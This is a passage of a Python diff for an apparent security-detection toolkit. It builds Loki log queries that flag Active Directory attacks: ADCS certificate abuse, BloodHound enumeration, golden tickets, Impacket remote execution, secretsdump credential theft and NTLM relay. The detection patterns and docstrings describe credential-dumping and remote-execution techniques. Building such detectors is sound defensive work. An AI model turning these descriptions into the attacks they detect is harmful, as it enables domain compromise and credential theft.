Looks for access to sensitive files like scripts, configs, GPP XML. + + MITRE ATT&CK: T1039 (Data from Network Shared Drive) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with file access indicators. + """ + dn.log_metric("query_template_smb_access", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 5145: Detailed file share access + # Look for sensitive file extensions and paths + logql = ( + '{job=~".+"}' + ' |~ "(?i)(5145|file.*access|share.*access|smbclient)"' + ' |~ "(?i)(\\.ps1|\\.bat|\\.cmd|\\.xml|\\.config|sysvol|netlogon|groups\\.xml)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"SMB file access detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "smb_file_access" + result["_mitre_technique"] = "T1039" + result["_red_team_tools"] = ["enumerate_share_files", "download_file_content"] + + return result + + # ========================================================================= + # PRIVILEGE ESCALATION (TA0004) + # Maps to: certipy (ADCS), delegation tools, bloodhound + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_adcs_exploitation( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ADCS certificate abuse (ESC1-ESC15). + + Detects red team's certipy tools exploiting certificate template misconfigurations. + ESC1 is particularly dangerous - allows requesting certs for any user. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ADCS exploitation indicators. + """ + dn.log_metric("query_template_adcs", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4886: Certificate request submitted + # Event 4887: Certificate Services approved certificate request + # Look for certipy patterns, suspicious certificate requests + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4886|4887|4876|certipy|certificate.*request)"' + ' |~ "(?i)(esc[0-9]|enrollee.*supplies.*subject|altname|upn)"' + ) + + logger.info(f"ADCS exploitation detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "adcs_exploitation" + result["_mitre_technique"] = "T1649" + result["_red_team_tools"] = ["certipy_find", "certipy_req_esc1", "certipy_auth"] + result["_severity"] = "high" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_delegation_abuse( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Kerberos delegation attacks (RBCD, unconstrained, constrained). + + Detects red team's delegation tools for privilege escalation: + - Resource-Based Constrained Delegation (RBCD) + - Unconstrained delegation exploitation + - S4U2Self/S4U2Proxy abuse + + MITRE ATT&CK: T1134.001 (Token Impersonation/Theft) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with delegation abuse indicators. + """ + dn.log_metric("query_template_delegation", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Look for: msDS-AllowedToActOnBehalfOfOtherIdentity modification + # S4U2Self/S4U2Proxy ticket requests, delegation attribute changes + logql = ( + '{job=~".+"}' + ' |~ "(?i)(delegation|msds-allowedtoactonbehalf|rbcd|s4u2)"' + ' |~ "(?i)(impersonate|constrained|unconstrained|getst|addcomputer)"' + ) + + logger.info(f"Delegation abuse detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "delegation_abuse" + result["_mitre_technique"] = "T1134.001" + result["_red_team_tools"] = ["find_delegation", "add_computer", "rbcd_write", "get_st"] + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_collection( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound/SharpHound data collection. + + Detects red team's BloodHound collection which maps AD relationships + to find privilege escalation paths. + + MITRE ATT&CK: T1087 (Account Discovery), T1069 (Permission Groups Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with BloodHound collection indicators. + """ + dn.log_metric("query_template_bloodhound", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # LDAP enumeration patterns, BloodHound/SharpHound signatures + logql = ( + '{job=~".+"}' + ' |~ "(?i)(bloodhound|sharphound|adexplorer|ldap.*query)"' + ' |~ "(?i)(acl|objectsid|memberof|primarygroup|msds)"' + ) + + logger.info(f"BloodHound collection detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_collection" + result["_mitre_techniques"] = ["T1087", "T1069", "T1482"] + result["_red_team_tool"] = "run_bloodhound" + + return result + + # ========================================================================= + # PERSISTENCE (TA0003) + # Maps to: golden_ticket + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_golden_ticket( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Golden Ticket creation and usage. + + Detects red team's golden ticket generation (impacket-ticketer). + Golden tickets provide persistent domain admin access using krbtgt hash. + + MITRE ATT&CK: T1558.001 (Golden Ticket) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with Golden Ticket indicators. + """ + dn.log_metric("query_template_golden_ticket", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4769 with suspicious patterns (krbtgt access, invalid timestamps) + # Look for ticketer tool patterns, krbtgt references + logql = ( + '{job=~".+"}' + ' |~ "(?i)(golden.*ticket|krbtgt|ticketer|krbcred)"' + ' |~ "(?i)(forged|4769|kerberos.*ticket|enterprise.*admin)"' + ) + + logger.info(f"Golden ticket detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "golden_ticket" + result["_mitre_technique"] = "T1558.001" + result["_red_team_tool"] = "generate_golden_ticket" + result["_severity"] = "critical" + + return result + + # ========================================================================= + # EXECUTION (TA0002) + # Maps to: general command execution patterns + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_suspicious_execution( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect suspicious command execution. + + Detects encoded PowerShell, LOLBins, and script interpreter abuse + commonly used during post-exploitation. + + MITRE ATT&CK: T1059 (Command and Scripting Interpreter) + + Args: + target_host: Optional hostname to focus on. + hours_back: Hours of logs to search. + + Returns: + Query results with execution indicators. + """ + dn.log_metric("query_template_execution", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4688: Process Creation (with command line logging) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4688|powershell|pwsh|cmd\\.exe|wscript|cscript)"' + ' |~ "(?i)(encodedcommand|bypass|hidden|downloadstring|invoke)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Suspicious execution detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "suspicious_execution" + result["_mitre_technique"] = "T1059" + + return result + + # ========================================================================= + # ADCS/CERTIPY SPECIFIC DETECTIONS (ESC1-ESC11) + # Maps to: certipy_find, certipy_req_esc1, certipy_auth + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_certipy_enumeration( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Certipy certificate template enumeration. + + Detects red team's certipy_find tool scanning for vulnerable certificate + templates. This is the reconnaissance phase before ADCS exploitation. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with Certipy enumeration indicators. + """ + dn.log_metric("query_template_certipy_enum", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Certipy enumeration queries LDAP for certificate templates + # Look for: msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag queries + logql = ( + '{job=~".+"}' + ' |~ "(?i)(certipy|ldap|389|636)"' + ' |~ "(?i)(mspki|pkienrollmentservice|certificatetemplates|pki)"' + ) + + logger.info(f"Certipy enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "certipy_enumeration" + result["_mitre_technique"] = "T1649" + result["_red_team_tool"] = "certipy_find" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_esc1_attack( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ESC1 - Enrollee Supplies Subject attack. + + ESC1 allows attackers to request certificates with arbitrary Subject + Alternative Names (SANs), enabling impersonation of any user including + Domain Admins. This is the most critical ADCS vulnerability. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ESC1 attack indicators. + """ + dn.log_metric("query_template_esc1", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # ESC1 indicators: + # - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in template + # - Certificate request with SAN different from requester + # - Event 4886/4887 with suspicious SAN + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4886|4887|certificate.*request|certipy)"' + ' |~ "(?i)(san=|subjectaltname|upn=|enrollee.*supplies|ct_flag)"' + ) + + logger.info(f"ESC1 attack detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "esc1_attack" + result["_mitre_technique"] = "T1649" + result["_red_team_tool"] = "certipy_req_esc1" + result["_severity"] = "critical" + result["_description"] = "ESC1: Enrollee supplies subject - allows impersonation" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_esc4_attack( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ESC4 - Vulnerable Certificate Template ACL attack. + + ESC4 exploits misconfigured ACLs on certificate templates where low-priv + users have write access to modify template settings. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ESC4 attack indicators. + """ + dn.log_metric("query_template_esc4", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # ESC4 involves modifying certificate template attributes + # Event 5136: Directory service object modified (on certificate template) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(5136|ldap.*modify|template.*modif)"' + ' |~ "(?i)(pki|certificatetemplate|mspki|enrollmentflag)"' + ) + + logger.info(f"ESC4 attack detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "esc4_attack" + result["_mitre_technique"] = "T1649" + result["_severity"] = "high" + result["_description"] = "ESC4: Certificate template ACL modification" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_esc8_attack( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ESC8 - NTLM Relay to AD CS HTTP Endpoints. + + ESC8 exploits AD CS web enrollment endpoints (certsrv) via NTLM relay. + Attackers coerce authentication then relay to the CA to request certs. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ESC8 attack indicators. + """ + dn.log_metric("query_template_esc8", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # ESC8 indicators: + # - HTTP requests to /certsrv/certfnsh.asp + # - NTLM relay patterns + # - PetitPotam/PrinterBug coercion followed by cert request + logql = ( + '{job=~".+"}' + ' |~ "(?i)(certsrv|certfnsh|certenroll|ntlmrelayx)"' + ' |~ "(?i)(relay|coerce|petitpotam|printerbug|dfscoerce)"' + ) + + logger.info(f"ESC8 attack detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "esc8_attack" + result["_mitre_technique"] = "T1649" + result["_severity"] = "critical" + result["_description"] = "ESC8: NTLM relay to AD CS web enrollment" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_certificate_authentication( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect authentication using stolen/forged certificates. + + Detects red team's certipy_auth using certificates for PKINIT auth + to obtain TGTs and NTLM hashes. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with cert auth indicators. + """ + dn.log_metric("query_template_cert_auth", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # PKINIT authentication, certificate-based Kerberos + # Event 4768 with certificate auth + logql = ( + '{job=~".+"}' + ' |~ "(?i)(pkinit|pkca|smartcard|certificate.*auth)"' + ' |~ "(?i)(4768|tgt.*request|kerberos|certipy.*auth)"' + ) + + logger.info(f"Certificate authentication detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "certificate_authentication" + result["_mitre_technique"] = "T1649" + result["_red_team_tool"] = "certipy_auth" + + return result + + # ========================================================================= + # BLOODHOUND SPECIFIC LDAP QUERY SIGNATURES + # Maps to: run_bloodhound + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_domain_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound domain trust and forest enumeration. + + BloodHound queries for cross-domain trust relationships and forest + topology to map potential attack paths. + + MITRE ATT&CK: T1482 (Domain Trust Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with domain enum indicators. + """ + dn.log_metric("query_template_bh_domain", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # BloodHound domain enumeration LDAP queries: + # - trusteddomain objectclass queries + # - crossRef objects for forest structure + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(trusteddomain|crossref|trusttype|trustdirection|trustattributes)"' + ) + + logger.info(f"BloodHound domain enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_domain_enum" + result["_mitre_technique"] = "T1482" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_acl_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound ACL/DACL enumeration. + + BloodHound's ACL collection queries for nTSecurityDescriptor on AD + objects to find privilege escalation paths via ACL abuse. + + MITRE ATT&CK: T1069.002 (Permission Groups Discovery: Domain Groups) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ACL enumeration indicators. + """ + dn.log_metric("query_template_bh_acl", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # BloodHound ACL collection LDAP patterns: + # - nTSecurityDescriptor attribute requests + # - Large LDAP queries for DACL + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(ntsecuritydescriptor|dacl|securitydescriptor|allowedtoactonbehalf)"' + ) + + logger.info(f"BloodHound ACL enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_acl_enum" + result["_mitre_technique"] = "T1069.002" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_session_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound session enumeration. + + BloodHound enumerates active user sessions on computers using + NetSessionEnum and NetWkstaUserEnum APIs to map where users are logged in. + + MITRE ATT&CK: T1033 (System Owner/User Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with session enum indicators. + """ + dn.log_metric("query_template_bh_session", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Session enumeration APIs: + # - NetSessionEnum (srvsvc) + # - NetWkstaUserEnum (wkssvc) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(srvsvc|wkssvc|netsession|netwksta)"' + ' |~ "(?i)(enum|bloodhound|sharphound|session.*collection)"' + ) + + logger.info(f"BloodHound session enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_session_enum" + result["_mitre_technique"] = "T1033" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_gpo_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound GPO enumeration. + + BloodHound enumerates Group Policy Objects to find GPO-based attack + paths and privilege escalation opportunities. + + MITRE ATT&CK: T1615 (Group Policy Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with GPO enum indicators. + """ + dn.log_metric("query_template_bh_gpo", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # GPO enumeration queries: + # - groupPolicyContainer objectclass + # - gPLink, gPCFileSysPath attributes + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(grouppolicycontainer|gplink|gpcfilesyspath|gpo)"' + ) + + logger.info(f"BloodHound GPO enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_gpo_enum" + result["_mitre_technique"] = "T1615" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_computer_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound computer enumeration. + + BloodHound queries for computer objects with specific attributes + to identify targets for lateral movement. + + MITRE ATT&CK: T1018 (Remote System Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with computer enum indicators. + """ + dn.log_metric("query_template_bh_computer", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Computer enumeration with BloodHound-specific attributes: + # - operatingsystem, operatingsystemversion + # - serviceprincipalname, msds-allowedtodelegateto + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(objectclass=computer|operatingsystem|serviceprincipalname|allowedtodelegateto)"' + ) + + logger.info(f"BloodHound computer enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_computer_enum" + result["_mitre_technique"] = "T1018" + result["_red_team_tool"] = "run_bloodhound" + + return result + + # ========================================================================= + # IMPACKET TOOL FINGERPRINTS + # Maps to: secretsdump, smbclient, wmiexec, psexec, atexec, dcomexec + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_wmiexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-wmiexec remote execution. + + Wmiexec uses WMI for semi-interactive shell, creating processes via + Win32_Process.Create. Output retrieved via SMB temp files. + + MITRE ATT&CK: T1047 (Windows Management Instrumentation) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with wmiexec indicators. + """ + dn.log_metric("query_template_wmiexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Wmiexec patterns: + # - WMI process creation events + # - cmd.exe /Q /c with output redirection to ADMIN$ + # - __InstanceCreationEvent subscription + logql = ( + '{job=~".+"}' + ' |~ "(?i)(wmi|win32_process|root\\\\cimv2)"' + ' |~ "(?i)(wmiexec|impacket|cmd.*\\/q.*\\/c|127\\.0\\.0\\.1.*admin\\$)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Wmiexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_wmiexec" + result["_mitre_technique"] = "T1047" + result["_red_team_tool"] = "wmiexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_psexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-psexec remote execution. + + Psexec uploads a service executable to ADMIN$ share, creates and starts + a service, then communicates via named pipe. Creates distinctive events. + + MITRE ATT&CK: T1569.002 (Service Execution) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with psexec indicators. + """ + dn.log_metric("query_template_psexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Psexec patterns: + # - Event 7045: Service installed (random 8-char name) + # - Service binary in ADMIN$ or C:\Windows + # - RemComSvc or similar service names + logql = ( + '{job=~".+"}' + ' |~ "(?i)(7045|service.*install|psexec|remcom)"' + ' |~ "(?i)(admin\\$|\\\\\\\\.*\\\\admin|service.*creat|cmd\\.exe)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Psexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_psexec" + result["_mitre_technique"] = "T1569.002" + result["_red_team_tool"] = "psexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_smbexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-smbexec remote execution. + + Smbexec creates a service that executes commands via cmd.exe with + output redirected to a share file. More stealthy than psexec. + + MITRE ATT&CK: T1569.002 (Service Execution) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with smbexec indicators. + """ + dn.log_metric("query_template_smbexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Smbexec patterns: + # - Service with cmd.exe /Q /c echo command + # - BTOBTO service name pattern (default) + # - Output to C:\__output or __output + logql = ( + '{job=~".+"}' + ' |~ "(?i)(7045|service|smbexec)"' + ' |~ "(?i)(btobto|cmd.*echo.*\\^>|__output|execute\\.bat)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Smbexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_smbexec" + result["_mitre_technique"] = "T1569.002" + result["_red_team_tool"] = "smbexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_atexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-atexec remote execution. + + Atexec uses the Task Scheduler (ATSVC) to create scheduled tasks + for command execution. Creates Event 4698 (scheduled task created). + + MITRE ATT&CK: T1053.002 (Scheduled Task) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with atexec indicators. + """ + dn.log_metric("query_template_atexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Atexec patterns: + # - Event 4698: Scheduled task created + # - Task name pattern (random characters) + # - cmd.exe /C execution in task + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4698|4699|4700|4701|schtask|taskscheduler|atsvc)"' + ' |~ "(?i)(atexec|impacket|cmd.*\\/c|schtasks)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Atexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_atexec" + result["_mitre_technique"] = "T1053.002" + result["_red_team_tool"] = "atexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_dcomexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-dcomexec remote execution. + + Dcomexec uses DCOM objects (MMC20.Application, ShellWindows, ShellBrowserWindow) + to execute commands remotely. Operates over TCP 135 (RPC). + + MITRE ATT&CK: T1021.003 (DCOM) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with dcomexec indicators. + """ + dn.log_metric("query_template_dcomexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Dcomexec patterns: + # - DCOM/RPC connections + # - MMC20.Application, ShellWindows, ShellBrowserWindow instantiation + # - Process created by mmc.exe or explorer.exe + logql = ( + '{job=~".+"}' + ' |~ "(?i)(dcom|135/tcp|rpc|mmc20|shellwindows|shellbrowser)"' + ' |~ "(?i)(dcomexec|impacket|executeshellcommand|document\\.application)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Dcomexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_dcomexec" + result["_mitre_technique"] = "T1021.003" + result["_red_team_tool"] = "dcomexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_secretsdump_sam( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-secretsdump SAM database dump. + + Secretsdump can dump local SAM database by accessing registry hives + remotely via SMB. Retrieves local account hashes. + + MITRE ATT&CK: T1003.002 (SAM) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with SAM dump indicators. + """ + dn.log_metric("query_template_secretsdump_sam", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # SAM dump patterns: + # - Remote registry access to SAM, SYSTEM, SECURITY hives + # - Event 4663: Object access on registry + # - reg save commands + logql = ( + '{job=~".+"}' + ' |~ "(?i)(registry|hklm|winreg|samr)"' + ' |~ "(?i)(sam|system|security|secretsdump|reg.*save)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"SAM dump detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_secretsdump_sam" + result["_mitre_technique"] = "T1003.002" + result["_red_team_tool"] = "secretsdump" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_secretsdump_lsa( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-secretsdump LSA secrets dump. + + Secretsdump extracts LSA secrets which may contain service account + passwords, autologon credentials, and other sensitive data. + + MITRE ATT&CK: T1003.004 (LSA Secrets) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with LSA dump indicators. + """ + dn.log_metric("query_template_secretsdump_lsa", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # LSA secrets dump patterns: + # - SECURITY hive access + # - LSA policy queries + # - $MACHINE.ACC, DefaultPassword, NL$KM patterns + logql = ( + '{job=~".+"}' + ' |~ "(?i)(lsa|security|policy|secrets)"' + ' |~ "(?i)(\\$machine|defaultpassword|nl\\$|dpapi|secretsdump)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"LSA secrets dump detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_secretsdump_lsa" + result["_mitre_technique"] = "T1003.004" + result["_red_team_tool"] = "secretsdump" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_ntlmrelayx( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-ntlmrelayx NTLM relay attacks. + + Ntlmrelayx intercepts NTLM authentication and relays it to target + services like SMB, LDAP, HTTP for unauthorized access. + + MITRE ATT&CK: T1557.001 (LLMNR/NBT-NS Poisoning and SMB Relay) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with NTLM relay indicators. + """ + dn.log_metric("query_template_ntlmrelayx", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # NTLM relay patterns: + # - Authentication from unexpected source IP + # - Rapid auth attempts with same NTLM challenge + # - SMB signing not required warnings + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ntlm|relay|responder|inveigh)"' + ' |~ "(?i)(ntlmrelayx|smbrelay|signing.*not.*required|coerce)"' + ) + + logger.info(f"NTLM relay detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_ntlmrelayx" + result["_mitre_technique"] = "T1557.001" + result["_red_team_tool"] = "ntlmrelayx" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_smbclient( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-smbclient share access. + + Smbclient provides interactive SMB access for enumeration and + file operations on remote shares. + + MITRE ATT&CK: T1021.002 (SMB/Windows Admin Shares) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with smbclient indicators. + """ + dn.log_metric("query_template_smbclient", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Smbclient patterns: + # - Interactive SMB session characteristics + # - Multiple share enumeration + # - File browsing patterns + logql = ( + '{job=~".+"}' + ' |~ "(?i)(smb|445/tcp|cifs|smbclient)"' + ' |~ "(?i)(impacket|tree.*connect|shares.*enum|file.*access)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Smbclient detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_smbclient" + result["_mitre_technique"] = "T1021.002" + result["_red_team_tool"] = "smbclient" + + return result + + # ========================================================================= + # HOST/USER INVESTIGATION HELPERS + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_host_activity( + self, + hostname: str, + hours_back: int = 24, + attack_patterns_only: bool = False, + ) -> dict[str, Any]: + """Get all activity for a specific host. + + Comprehensive query to gather logs for a host during investigation. + Can optionally filter to only show attack-related patterns. + + Args: + hostname: Hostname to investigate. + hours_back: Hours of logs to search. + attack_patterns_only: If True, filter for attack patterns only. + + Returns: + All log activity for the specified host. + """ + dn.log_metric("query_template_host_activity", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + if attack_patterns_only: + logql = ( + f'{{hostname=~".*{hostname}.*"}} |~ "(?i)(4625|4624|4662|4769|4768|5140|7045|4688)"' + ) + else: + logql = f'{{hostname=~".*{hostname}.*"}}' + + logger.info(f"Host activity query: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=1000) + result["_query_template"] = "host_activity" + result["_target_host"] = hostname + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_user_activity( 